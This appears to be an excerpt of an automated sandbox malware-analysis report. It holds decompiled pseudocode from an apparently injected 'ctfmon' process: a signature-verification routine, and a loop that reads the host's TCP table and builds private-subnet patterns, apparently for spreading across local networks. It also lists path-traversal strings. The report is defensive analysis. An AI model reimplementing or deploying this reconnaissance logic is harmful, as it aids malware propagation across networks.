                                                												}
                                                												L78:
                                                												__eflags = _t339;
                                                												if(_t339 != 0) {
                                                													E00970AAF(_t339);
                                                													_t430 = _t430 + 4;
                                                												}
                                                												 *(memcpy( &(_t395[2]), _t307, 0x4b << 2) + 0x134) = _a4;
                                                												_pop(_t416);
                                                												__eflags = _v8 ^ _t430 + 0xc;
                                                												return E00970A5D(_v8 ^ _t430 + 0xc, _t416);
                                                												goto L82;
                                                											}
                                                										} else {
                                                											E00970AAF(_t412);
                                                											_t428 = _t430 + 4;
                                                											goto L24;
                                                										}
                                                									}
                                                								} else {
                                                									_pop(_t418);
                                                									__eflags = _v8 ^ _t427;
                                                									return E00970A5D(_v8 ^ _t427, _t418);
                                                								}
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							if(_t409 == 0xffffffff) {
                                                								L8:
                                                								 *_t307 =  *( *_t395 + 4);
                                                								 *((char*)(_t307 + 4)) = 0;
                                                								 *(_t307 + 0x108) = 0;
                                                								 *(_t307 + 0x10c) = 0;
                                                								 *(_t307 + 0x110) = 0;
                                                								 *(_t307 + 0x114) = 0;
                                                								 *(_t307 + 0x118) = 0;
                                                								 *(_t307 + 0x11c) = 0;
                                                								 *(_t307 + 0x120) = 0;
                                                								 *(_t307 + 0x124) = 0;
                                                								 *(_t307 + 0x128) = 0;
                                                								_pop(_t419);
                                                								__eflags = _v8 ^ _t424;
                                                								return E00970A5D(_v8 ^ _t424, _t419);
                                                							} else {
                                                								memcpy(_t307,  &(_t395[2]), 0x4b << 2);
                                                								_pop(_t421);
                                                								return E00970A5D(_v8 ^ _t424 + 0xc, _t421);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L82:
                                                			}
                                                0x0096f94d
                                                0x0096f950
                                                0x00000000
                                                0x0096f952
                                                0x0096f952
                                                0x0096f955
                                                0x0096f958
                                                0x0096f95a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096f95a
                                                0x0096f950
                                                0x0096f965
                                                0x0096f965
                                                0x0096f967
                                                0x0096f988
                                                0x0096f98c
                                                0x0096f994
                                                0x0096f999
                                                0x0096f99e
                                                0x0096f9a2
                                                0x0096f9a7
                                                0x0096f9ae
                                                0x0096f9b4
                                                0x0096f9b8
                                                0x0096f9ba
                                                0x0096f9d5
                                                0x0096f9d9
                                                0x0096f9dc
                                                0x0096f9df
                                                0x0096f9e5
                                                0x0096f9e5
                                                0x0096f9ea
                                                0x0096f9f0
                                                0x0096f9f8
                                                0x0096f9fe
                                                0x0096fa05
                                                0x0096fa05
                                                0x0096fa09
                                                0x0096fa0b
                                                0x0096fa26
                                                0x0096fa2a
                                                0x0096fa2d
                                                0x0096fa30
                                                0x0096fa36
                                                0x0096fa36
                                                0x0096fa3b
                                                0x0096fa41
                                                0x0096fa49
                                                0x0096fa4f
                                                0x0096fa52
                                                0x0096fa57
                                                0x0096fa7d
                                                0x0096fa83
                                                0x0096fa83
                                                0x0096fa88
                                                0x0096fa8e
                                                0x0096fa96
                                                0x0096fa9c
                                                0x00000000
                                                0x0096f969
                                                0x0096f969
                                                0x0096f972
                                                0x0096f978
                                                0x0096f97a
                                                0x0096f97d
                                                0x0096f981
                                                0x0096f920
                                                0x00000000
                                                0x00000000
                                                0x0096f983
                                                0x0096f981
                                                0x00000000
                                                0x0096f967
                                                0x0096f960
                                                0x0096f962
                                                0x0096f962
                                                0x00000000
                                                0x0096f962
                                                0x0096f924
                                                0x0096faa3
                                                0x0096faa3
                                                0x0096faa5
                                                0x0096faa8
                                                0x0096faad
                                                0x0096faad
                                                0x0096fac3
                                                0x0096facc
                                                0x0096fad5
                                                0x0096fadf
                                                0x00000000
                                                0x0096fadf
                                                0x0096f6f1
                                                0x0096f6f2
                                                0x0096f6f7
                                                0x00000000
                                                0x0096f6f7
                                                0x0096f6ef
                                                0x0096f690
                                                0x0096f696
                                                0x0096f69f
                                                0x0096f6a9
                                                0x0096f6a9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096f53b
                                                0x0096f53e
                                                0x0096f56a
                                                0x0096f56f
                                                0x0096f573
                                                0x0096f577
                                                0x0096f581
                                                0x0096f58b
                                                0x0096f595
                                                0x0096f59f
                                                0x0096f5a9
                                                0x0096f5b3
                                                0x0096f5bd
                                                0x0096f5c7
                                                0x0096f5d2
                                                0x0096f5db
                                                0x0096f5e5
                                                0x0096f540
                                                0x0096f54c
                                                0x0096f54f
                                                0x0096f562
                                                0x0096f562
                                                0x0096f53e
                                                0x0096f539
                                                0x0096f51b
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /../$/..\$/LU5/$\../$\..\
                                                • API String ID: 0-377722686
                                                • Opcode ID: 06f532405b0440f305a27c5e53877c8b207e6ae2183dba2c672591ff46ac9a4a
                                                • Instruction ID: 2aa745b3fd156db1e37c1a6955bf1c465264fb2e0c9ff012382bb4c222c7a978
                                                • Opcode Fuzzy Hash: 06f532405b0440f305a27c5e53877c8b207e6ae2183dba2c672591ff46ac9a4a
                                                • Instruction Fuzzy Hash: 4602D8715043418FC724CF28D4A17AABBE1BFD5314F188A7DE8DA8B282D775E909CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 530 964920-96493d CryptAcquireContextA 531 964945-964962 CryptImportKey 530->531 532 96493f-964944 530->532 531->532 533 964964-96497c CryptCreateHash 531->533 533->532 534 96497e-964991 CryptHashData 533->534 534->532 535 964993-9649be CryptVerifySignatureA 534->535 536 9649c7-9649cc 535->536 537 9649c0-9649c1 CryptDestroyHash 535->537 538 9649d7-9649dd 536->538 539 9649ce-9649d1 CryptReleaseContext 536->539 537->536 539->538
                                                C-Code - Quality: 28%
                                                			E00964920(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				long* _v12;
                                                				long* _v16;
                                                				int _t16;
                                                				int _t18;
                                                				char* _t20;
                                                				intOrPtr _t21;
                                                				void* _t24;
                                                				void* _t27;
                                                				long* _t30;
                                                
                                                				_t16 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
                                                				if(_t16 != 0) {
                                                					_t18 = CryptImportKey(_v12, 0x990ce0, 0x94, 0, 0,  &_v16); // executed
                                                					if(_t18 == 0) {
                                                						goto L1;
                                                					} else {
                                                						_t20 =  &_v8;
                                                						__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t20); // executed
                                                						if(_t20 == 0) {
                                                							goto L1;
                                                						} else {
                                                							__imp__CryptHashData(_v8, _a4, _a8, 0);
                                                							if(_t20 == 0) {
                                                								goto L1;
                                                							} else {
                                                								__imp__CryptVerifySignatureA(_v8, _a12, _a16, _v16, 0, 0, _t24); // executed
                                                								_t21 = _v8;
                                                								_t27 =  !=  ? 1 : 0;
                                                								if(_t21 != 0) {
                                                									__imp__CryptDestroyHash(_t21);
                                                								}
                                                								_t30 = _v12;
                                                								if(_t30 != 0) {
                                                									CryptReleaseContext(_t30, 0);
                                                								}
                                                								return _t27;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					return 0;
                                                				}
                                                			}














                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 00964935
                                                • CryptImportKey.ADVAPI32(00000000,00990CE0,00000094,00000000,00000000,?), ref: 0096495A
                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 00964974
                                                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 00964989
                                                • CryptVerifySignatureA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?), ref: 009649A6
                                                • CryptDestroyHash.ADVAPI32(?), ref: 009649C1
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 009649D1
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyImportReleaseSignatureVerify
                                                • String ID:
                                                • API String ID: 949692108-0
                                                • Opcode ID: 0589fda953823c4926ef38df66df0763a5dd48c16624c909ff39f51114adfbef
                                                • Instruction ID: 256fefe5c6e6d9839213a986f33dc403aef453e0a2eadbcbf98c3d65099c50d6
                                                • Opcode Fuzzy Hash: 0589fda953823c4926ef38df66df0763a5dd48c16624c909ff39f51114adfbef
                                                • Instruction Fuzzy Hash: BC213035B84308BBEF219FA0DC46FAE7BBDAB05B01F100054BA08E61E0D7719A14EB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E009715D6() {
                                                				_Unknown_base(*)()* _t1;
                                                
                                                				_t1 = SetUnhandledExceptionFilter(E009715E2); // executed
                                                				return _t1;
                                                			}





                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_000115E2,00971014), ref: 009715DB
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 671f0d3ad4fd27035adaa78a1e149df6077c1bef8ea6cf6fc579b51c244abf70
                                                • Instruction ID: 7c850f5a6cadfdd56d0e01d4716e365abcf13f31d0cb3aa0c04926e849e0d4bd
                                                • Opcode Fuzzy Hash: 671f0d3ad4fd27035adaa78a1e149df6077c1bef8ea6cf6fc579b51c244abf70
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 965200-965255 Sleep call 973440 2 96525a-965284 GetProcessHeap HeapAlloc 0->2 3 96528a 2->3 4 9657bb-9657d6 call 970a5d 2->4 6 965290-9652ad GetTcpTable 3->6 8 9652af-9652d2 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 6->8 9 9652d8-9652ea GetTcpTable 6->9 8->4 8->9 10 9657b3-9657b9 GetProcessHeap HeapFree 9->10 11 9652f0-9652f8 9->11 10->4 12 965777-9657ab GetProcessHeap HeapFree Sleep GetProcessHeap HeapAlloc 11->12 13 9652fe-965307 11->13 12->6 15 9657b1 12->15 14 965310-96535d call 973440 call 965180 13->14 20 96535f-965362 14->20 21 965389-9653ab 14->21 15->4 24 965377-96537a 20->24 25 965364-965367 20->25 22 9653b1-9653ba 21->22 23 9653ad-9653af 21->23 30 9653c0-9653c5 22->30 29 9653c9-9653f7 call 965a00 call 966530 23->29 26 965741-965765 24->26 28 965380-965383 24->28 25->26 27 96536d-965370 25->27 26->14 34 96576b-965771 26->34 27->21 31 965372 27->31 28->21 28->26 38 96545b 29->38 39 9653f9-965403 29->39 30->30 32 9653c7 30->32 31->26 32->29 34->12 40 96545d-96546b 38->40 41 965407-965435 call 9651a0 39->41 42 965405 39->42 44 96546d-965475 call 965cf0 40->44 45 96547a-96547c 40->45 49 965437-96543f 41->49 50 96544f-965454 41->50 42->41 44->45 45->26 48 965482-9654a4 45->48 51 9654a6-9654a8 48->51 52 9654aa-9654b0 48->52 55 965446-96544a 49->55 56 965441-965444 49->56 50->40 57 965456 50->57 53 9654bc-965506 call 965a00 call 9664b0 51->53 54 9654b3-9654b8 52->54 64 96556a 53->64 65 965508-965512 53->65 54->54 58 9654ba 54->58 60 96544d 55->60 56->60 57->38 58->53 60->50 66 96556c-96556e 64->66 67 965516-965544 call 9651a0 65->67 68 965514 65->68 69 965574-965596 66->69 70 965600 66->70 79 965546-96554e 67->79 80 96555e-965563 67->80 68->67 73 96559c-9655a2 69->73 74 965598-96559a 69->74 72 965606 70->72 76 965608-965611 72->76 78 9655a5-9655aa 73->78 77 9655ae-9655fa call 965a00 call 9657e0 GetTickCount 74->77 82 965655-96565f 76->82 83 965613-965625 76->83 77->72 105 9655fc-9655fe 
77->105 78->78 84 9655ac 78->84 86 965555-965559 79->86 87 965550-965553 79->87 80->66 81 965565 80->81 81->64 91 965682-965684 82->91 92 965661-965673 82->92 89 965627-965634 call 965cf0 83->89 90 96563a-96564e 83->90 84->77 88 96555c 86->88 87->88 88->80 89->90 90->82 91->26 96 96568a-9656ac 91->96 92->91 95 965675-96567d call 965cf0 92->95 95->91 100 9656b2-9656bb 96->100 101 9656ae-9656b0 96->101 103 9656c0-9656c5 100->103 104 9656c9-965705 call 965a00 call 9657e0 GetTickCount 101->104 103->103 106 9656c7 103->106 111 965707-96570f call 965cf0 104->111 112 965714-96573e call 96b4e0 104->112 105->76 106->104 111->112 112->26
                                                C-Code - Quality: 74%
                                                			E00965200(void* __ebx, void* __edi) {
                                                				long _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v148;
                                                				intOrPtr _v152;
                                                				long _v156;
                                                				char _v172;
                                                				intOrPtr _v176;
                                                				long _v180;
                                                				char _v196;
                                                				intOrPtr _v200;
                                                				long _v204;
                                                				char _v220;
                                                				signed int _v224;
                                                				long _v228;
                                                				void* _v232;
                                                				signed int _v236;
                                                				intOrPtr _v240;
                                                				signed int* _v244;
                                                				signed int _v248;
                                                				void* __esi;
                                                				signed int _t127;
                                                				signed int _t128;
                                                				long* _t136;
                                                				long* _t137;
                                                				void* _t143;
                                                				signed int _t155;
                                                				intOrPtr* _t160;
                                                				intOrPtr _t161;
                                                				intOrPtr _t163;
                                                				signed int _t164;
                                                				signed int _t168;
                                                				intOrPtr* _t171;
                                                				intOrPtr* _t172;
                                                				signed int _t173;
                                                				intOrPtr _t179;
                                                				intOrPtr _t183;
                                                				intOrPtr _t186;
                                                				signed int _t189;
                                                				signed int _t193;
                                                				intOrPtr* _t195;
                                                				long _t196;
                                                				signed int _t200;
                                                				signed int _t207;
                                                				void* _t215;
                                                				signed int _t217;
                                                				signed int _t218;
                                                				signed int _t219;
                                                				signed int* _t224;
                                                				intOrPtr* _t225;
                                                				signed int _t226;
                                                				intOrPtr* _t229;
                                                				signed int _t230;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				intOrPtr* _t237;
                                                				signed int _t238;
                                                				long _t242;
                                                				long _t245;
                                                				void* _t247;
                                                				intOrPtr _t250;
                                                				intOrPtr _t251;
                                                				intOrPtr* _t253;
                                                				void* _t254;
                                                				void* _t255;
                                                				void* _t256;
                                                				signed int _t257;
                                                				void* _t258;
                                                				void* _t260;
                                                
                                                				_push(0xffffffff);
                                                				_push(E0098456F);
                                                				_push( *[fs:0x0]);
                                                				_t127 =  *0x98f008; // 0x35554c2f
                                                				_t128 = _t127 ^ _t257;
                                                				_v20 = _t128;
                                                				_push(__edi);
                                                				_push(_t128);
                                                				 *[fs:0x0] =  &_v16;
                                                				_v224 = 0;
                                                				_v236 = 0;
                                                				Sleep(0x1388); // executed
                                                				E00973440(__edi,  &_v148, 0, 0x80);
                                                				_t253 = GetProcessHeap;
                                                				_t260 = _t258 - 0xe8 + 0xc;
                                                				_v228 = 0;
                                                				_t215 = HeapAlloc(GetProcessHeap(), 0, 0x18);
                                                				_v232 = _t215;
                                                				if(_t215 == 0) {
                                                					L80:
                                                					 *[fs:0x0] = _v16;
                                                					_pop(_t254);
                                                					return E00970A5D(_v20 ^ _t257, _t254);
                                                				}
                                                				_t250 = HeapFree;
                                                				do {
                                                					_t136 =  &_v228;
                                                					_v228 = 0x18;
                                                					__imp__GetTcpTable(_t215, _t136, 1);
                                                					if(_t136 != 0x7a) {
                                                						L4:
                                                						_t137 =  &_v228;
                                                						__imp__GetTcpTable(_t215, _t137, 1);
                                                						if(_t137 != 0) {
                                                							HeapFree(GetProcessHeap(), 0, _t215);
                                                							goto L80;
                                                						}
                                                						_v240 = _t137;
                                                						if( *_t215 <= _t137) {
                                                							goto L77;
                                                						}
                                                						_t14 = _t215 + 0x10; // 0x10
                                                						_t224 = _t14;
                                                						_v244 = _t224;
                                                						asm("o16 nop [eax+eax]");
                                                						do {
                                                							_t217 =  *_t224;
                                                							_v248 = _t217;
                                                							E00973440(_t250,  &_v148, 0, 0x80);
                                                							_push(_t217 >> 0x00000010 & 0x000000ff);
                                                							_push(_t217 >> 0x00000008 & 0x000000ff);
                                                							E00965180( &_v148, 0x80, "%d.%d.%d.*", _t217 & 0x000000ff);
                                                							_t260 = _t260 + 0x24;
                                                							if(_t217 == 0xa) {
                                                								L14:
                                                								__eflags = _v148;
                                                								_v152 = 0xf;
                                                								_v156 = 0;
                                                								_v172 = 0;
                                                								if(_v148 != 0) {
                                                									_t225 =  &_v148;
                                                									_t24 = _t225 + 1; // 0x1
                                                									_t246 = _t24;
                                                									asm("o16 nop [eax+eax]");
                                                									do {
                                                										_t155 =  *_t225;
                                                										_t225 = _t225 + 1;
                                                										__eflags = _t155;
                                                									} while (_t155 != 0);
                                                									_t226 = _t225 - _t246;
                                                									__eflags = _t226;
                                                									L19:
                                                									_push(_t226);
                                                									_push( &_v148);
                                                									E00965A00(_t217,  &_v172, _t250, _t253);
                                                									_t250 =  *0x996a8c;
                                                									_t255 = E00966530( &_v172,  &_v172);
                                                									_t160 =  *0x996a8c;
                                                									__eflags = _t255 - _t160;
                                                									if(_t255 == _t160) {
                                                										L29:
                                                										_t253 = _t160;
                                                										L30:
                                                										_t161 = _v152;
                                                										__eflags = _t253 - _t250;
                                                										_t218 = _t217 & 0xffffff00 | _t253 == _t250;
                                                										__eflags = _t161 - 0x10;
                                                										if(_t161 >= 0x10) {
                                                											__eflags = _t161 + 1;
                                                											E00965CF0(_t218, _t246, _t250, _v172, _t161 + 1);
                                                										}
                                                										__eflags = _t218;
                                                										if(_t218 == 0) {
                                                											goto L75;
                                                										} else {
                                                											__eflags = _v148;
                                                											_v152 = 0xf;
                                                											_v156 = 0;
                                                											_v172 = 0;
                                                											if(_v148 != 0) {
                                                												_t229 =  &_v148;
                                                												_t50 = _t229 + 1; // 0x1
                                                												_t246 = _t50;
                                                												do {
                                                													_t164 =  *_t229;
                                                													_t229 = _t229 + 1;
                                                													__eflags = _t164;
                                                												} while (_t164 != 0);
                                                												_t230 = _t229 - _t246;
                                                												__eflags = _t230;
                                                												L38:
                                                												_push(_t230);
                                                												_push( &_v148);
                                                												E00965A00(_t218,  &_v172, _t250, _t253);
                                                												_v8 = 0;
                                                												_t251 =  *0x996a54;
                                                												_t168 = _v224 | 0x00000001;
                                                												_v224 = _t168;
                                                												_v236 = _t168;
                                                												_t256 = E009664B0( &_v172,  &_v172);
                                                												_t171 =  *0x996a54;
                                                												__eflags = _t256 - _t171;
                                                												if(_t256 == _t171) {
                                                													L48:
                                                													_t253 = _t171;
                                                													L49:
                                                													__eflags = _t253 - _t251;
                                                													if(_t253 == _t251) {
                                                														_t250 = GetTickCount;
                                                														L58:
                                                														_t219 = 1;
                                                														L59:
                                                														_t232 = _v224;
                                                														__eflags = _t232 & 0x00000002;
                                                														if((_t232 & 0x00000002) != 0) {
                                                															_t186 = _v176;
                                                															_t232 = _t232 & 0xfffffffd;
                                                															_v224 = _t232;
                                                															__eflags = _t186 - 0x10;
                                                															if(_t186 >= 0x10) {
                                                																__eflags = _t186 + 1;
                                                																E00965CF0(_t219, _t246, _t250, _v196, _t186 + 1);
                                                																_t232 = _v224;
                                                															}
                                                															_v176 = 0xf;
                                                															_v180 = 0;
                                                															_v196 = 0;
                                                														}
                                                														_v8 = 0xffffffff;
                                                														__eflags = _t232 & 0x00000001;
                                                														if((_t232 & 0x00000001) != 0) {
                                                															_t183 = _v152;
                                                															_v224 = _t232 & 0xfffffffe;
                                                															__eflags = _t183 - 0x10;
                                                															if(_t183 >= 0x10) {
                                                																__eflags = _t183 + 1;
                                                																E00965CF0(_t219, _t246, _t250, _v172, _t183 + 1);
                                                															}
                                                														}
                                                														__eflags = _t219;
                                                														if(_t219 == 0) {
                                                															goto L75;
                                                														} else {
                                                															__eflags = _v148;
                                                															_v200 = 0xf;
                                                															_v204 = 0;
                                                															_v220 = 0;
                                                															if(_v148 != 0) {
                                                																_t172 =  &_v148;
                                                																_t105 = _t172 + 1; // 0x1
                                                																_t247 = _t105;
                                                																do {
                                                																	_t233 =  *_t172;
                                                																	_t172 = _t172 + 1;
                                                																	__eflags = _t233;
                                                																} while (_t233 != 0);
                                                																_t173 = _t172 - _t247;
                                                																__eflags = _t173;
                                                																L72:
                                                																_push(_t173);
                                                																_push( &_v148);
                                                																E00965A00(_t219,  &_v220, _t250, _t253);
                                                																_v8 = 2;
                                                																_t253 = E009657E0( &_v220,  &_v220);
                                                																 *_t253 = GetTickCount();
                                                																_v8 = 0xffffffff;
                                                																_t179 = _v200;
                                                																__eflags = _t179 - 0x10;
                                                																if(_t179 >= 0x10) {
                                                																	__eflags = _t179 + 1;
                                                																	E00965CF0(_t219, _t246, _t250, _v220, _t179 + 1);
                                                																}
                                                																_t246 = 0;
                                                																__eflags = 0;
                                                																_v200 = 0xf;
                                                																_v204 = 0;
                                                																_v220 = 0;
                                                																E0096B4E0(_t219,  &_v248, 0, _t250, 1);
                                                																_t260 = _t260 + 4;
                                                																goto L75;
                                                															}
                                                															_t173 = 0;
                                                															goto L72;
                                                														}
                                                													}
                                                													__eflags = _v148;
                                                													_v176 = 0xf;
                                                													_v180 = 0;
                                                													_v196 = 0;
                                                													if(_v148 != 0) {
                                                														_t237 =  &_v148;
                                                														_t76 = _t237 + 1; // 0x1
                                                														_t246 = _t76;
                                                														do {
                                                															_t189 =  *_t237;
                                                															_t237 = _t237 + 1;
                                                															__eflags = _t189;
                                                														} while (_t189 != 0);
                                                														_t238 = _t237 - _t246;
                                                														__eflags = _t238;
                                                														L55:
                                                														_push(_t238);
                                                														_push( &_v148);
                                                														E00965A00(_t218,  &_v196, _t251, _t253);
                                                														_v8 = 1;
                                                														_t193 = _v224 | 0x00000002;
                                                														_v224 = _t193;
                                                														_v236 = _t193;
                                                														_t195 = E009657E0( &_v196,  &_v196);
                                                														_t250 = GetTickCount;
                                                														_t253 = _t195;
                                                														_t196 = GetTickCount();
                                                														__eflags = _t196 -  *_t253 - 0x493e0;
                                                														if(_t196 -  *_t253 > 0x493e0) {
                                                															goto L58;
                                                														}
                                                														_t219 = 0;
                                                														goto L59;
                                                													}
                                                													_t238 = 0;
                                                													goto L55;
                                                												}
                                                												__eflags =  *((intOrPtr*)(_t256 + 0x24)) - 0x10;
                                                												_t59 = _t256 + 0x10; // 0x10
                                                												_t246 = _t59;
                                                												_t218 =  *(_t246 + 0x10);
                                                												if( *((intOrPtr*)(_t256 + 0x24)) >= 0x10) {
                                                													_t246 =  *_t246;
                                                												}
                                                												__eflags = _v152 - 0x10;
                                                												_t241 =  >=  ? _v172 :  &_v172;
                                                												__eflags = _v156 - _t218;
                                                												_t199 =  <  ? _v156 : _t218;
                                                												_t200 = E009651A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t218);
                                                												_t260 = _t260 + 4;
                                                												__eflags = _t200;
                                                												if(__eflags == 0) {
                                                													_t242 = _v156;
                                                													__eflags = _t242 - _t218;
                                                													if(_t242 >= _t218) {
                                                														__eflags = _t242 - _t218;
                                                														_t68 = _t242 != _t218;
                                                														__eflags = _t68;
                                                														_t200 = 0 | _t68;
                                                													} else {
                                                														_t200 = _t200 | 0xffffffff;
                                                													}
                                                													__eflags = _t200;
                                                												}
                                                												if(__eflags == 0) {
                                                													goto L49;
                                                												} else {
                                                													_t171 =  *0x996a54;
                                                													goto L48;
                                                												}
                                                											}
                                                											_t230 = 0;
                                                											goto L38;
                                                										}
                                                									}
                                                									__eflags =  *((intOrPtr*)(_t255 + 0x24)) - 0x10;
                                                									_t29 = _t255 + 0x10; // 0x10
                                                									_t246 = _t29;
                                                									_t217 =  *(_t246 + 0x10);
                                                									if( *((intOrPtr*)(_t255 + 0x24)) >= 0x10) {
                                                										_t246 =  *_t246;
                                                									}
                                                									__eflags = _v152 - 0x10;
                                                									_t244 =  >=  ? _v172 :  &_v172;
                                                									__eflags = _v156 - _t217;
                                                									_t206 =  <  ? _v156 : _t217;
                                                									_t207 = E009651A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t217);
                                                									_t260 = _t260 + 4;
                                                									__eflags = _t207;
                                                									if(__eflags == 0) {
                                                										_t245 = _v156;
                                                										__eflags = _t245 - _t217;
                                                										if(_t245 >= _t217) {
                                                											__eflags = _t245 - _t217;
                                                											_t38 = _t245 != _t217;
                                                											__eflags = _t38;
                                                											_t207 = 0 | _t38;
                                                										} else {
                                                											_t207 = _t207 | 0xffffffff;
                                                										}
                                                										__eflags = _t207;
                                                									}
                                                									if(__eflags == 0) {
                                                										goto L30;
                                                									} else {
                                                										_t160 =  *0x996a8c;
                                                										goto L29;
                                                									}
                                                								}
                                                								_t226 = 0;
                                                								goto L19;
                                                							}
                                                							if(_t217 != 0xac) {
                                                								__eflags = _t217 - 0xc0;
                                                								if(_t217 != 0xc0) {
                                                									goto L75;
                                                								}
                                                								__eflags = _t217 - 0xa8;
                                                								if(_t217 != 0xa8) {
                                                									goto L75;
                                                								}
                                                								goto L14;
                                                							}
                                                							if(_t217 < 0x10) {
                                                								goto L75;
                                                							}
                                                							if(_t217 <= 0x1f) {
                                                								goto L14;
                                                							}
                                                							L75:
                                                							_t215 = _v232;
                                                							_t163 = _v240 + 1;
                                                							_t224 =  &(_v244[5]);
                                                							_v240 = _t163;
                                                							_v244 = _t224;
                                                						} while (_t163 <  *_t215);
                                                						_t253 = GetProcessHeap;
                                                						_t250 = HeapFree;
                                                						goto L77;
                                                					}
                                                					HeapFree(GetProcessHeap(), 0, _t215);
                                                					_t215 = HeapAlloc(GetProcessHeap(), 0, _v228);
                                                					_v232 = _t215;
                                                					if(_t215 == 0) {
                                                						goto L80;
                                                					}
                                                					goto L4;
                                                					L77:
                                                					HeapFree(GetProcessHeap(), 0, _t215);
                                                					Sleep(0x1388);
                                                					_v228 = 0;
                                                					_t143 = HeapAlloc(GetProcessHeap(), 0, 0x18);
                                                					_t215 = _t143;
                                                					_v232 = _t143;
                                                				} while (_t215 != 0);
                                                				goto L80;
                                                			}
                                                0x0096564e
                                                0x00965655
                                                0x0096565c
                                                0x0096565f
                                                0x00965661
                                                0x0096566a
                                                0x00965670
                                                0x00965673
                                                0x00965675
                                                0x0096567d
                                                0x0096567d
                                                0x00965673
                                                0x00965682
                                                0x00965684
                                                0x00000000
                                                0x0096568a
                                                0x0096568a
                                                0x00965691
                                                0x0096569b
                                                0x009656a5
                                                0x009656ac
                                                0x009656b2
                                                0x009656b8
                                                0x009656b8
                                                0x009656c0
                                                0x009656c0
                                                0x009656c2
                                                0x009656c3
                                                0x009656c3
                                                0x009656c7
                                                0x009656c7
                                                0x009656c9
                                                0x009656c9
                                                0x009656d0
                                                0x009656d7
                                                0x009656e2
                                                0x009656ef
                                                0x009656f3
                                                0x009656f5
                                                0x009656fc
                                                0x00965702
                                                0x00965705
                                                0x00965707
                                                0x0096570f
                                                0x0096570f
                                                0x00965716
                                                0x00965716
                                                0x00965718
                                                0x00965728
                                                0x00965732
                                                0x00965739
                                                0x0096573e
                                                0x00000000
                                                0x0096573e
                                                0x009656ae
                                                0x00000000
                                                0x009656ae
                                                0x00965684
                                                0x00965574
                                                0x0096557b
                                                0x00965585
                                                0x0096558f
                                                0x00965596
                                                0x0096559c
                                                0x009655a2
                                                0x009655a2
                                                0x009655a5
                                                0x009655a5
                                                0x009655a7
                                                0x009655a8
                                                0x009655a8
                                                0x009655ac
                                                0x009655ac
                                                0x009655ae
                                                0x009655ae
                                                0x009655b5
                                                0x009655bc
                                                0x009655c1
                                                0x009655ce
                                                0x009655d1
                                                0x009655d7
                                                0x009655e4
                                                0x009655e9
                                                0x009655ef
                                                0x009655f1
                                                0x009655f5
                                                0x009655fa
                                                0x00000000
                                                0x00000000
                                                0x009655fc
                                                0x00000000
                                                0x009655fc
                                                0x00965598
                                                0x00000000
                                                0x00965598
                                                0x00965508
                                                0x0096550c
                                                0x0096550c
                                                0x0096550f
                                                0x00965512
                                                0x00965514
                                                0x00965514
                                                0x00965516
                                                0x00965525
                                                0x0096552c
                                                0x00965532
                                                0x0096553a
                                                0x0096553f
                                                0x00965542
                                                0x00965544
                                                0x00965546
                                                0x0096554c
                                                0x0096554e
                                                0x00965557
                                                0x00965559
                                                0x00965559
                                                0x00965559
                                                0x00965550
                                                0x00965550
                                                0x00965550
                                                0x0096555c
                                                0x0096555c
                                                0x00965563
                                                0x00000000
                                                0x00965565
                                                0x00965565
                                                0x00000000
                                                0x00965565
                                                0x00965563
                                                0x009654a6
                                                0x00000000
                                                0x009654a6
                                                0x0096547c
                                                0x009653f9
                                                0x009653fd
                                                0x009653fd
                                                0x00965400
                                                0x00965403
                                                0x00965405
                                                0x00965405
                                                0x00965407
                                                0x00965416
                                                0x0096541d
                                                0x00965423
                                                0x0096542b
                                                0x00965430
                                                0x00965433
                                                0x00965435
                                                0x00965437
                                                0x0096543d
                                                0x0096543f
                                                0x00965448
                                                0x0096544a
                                                0x0096544a
                                                0x0096544a
                                                0x00965441
                                                0x00965441
                                                0x00965441
                                                0x0096544d
                                                0x0096544d
                                                0x00965454
                                                0x00000000
                                                0x00965456
                                                0x00965456
                                                0x00000000
                                                0x00965456
                                                0x00965454
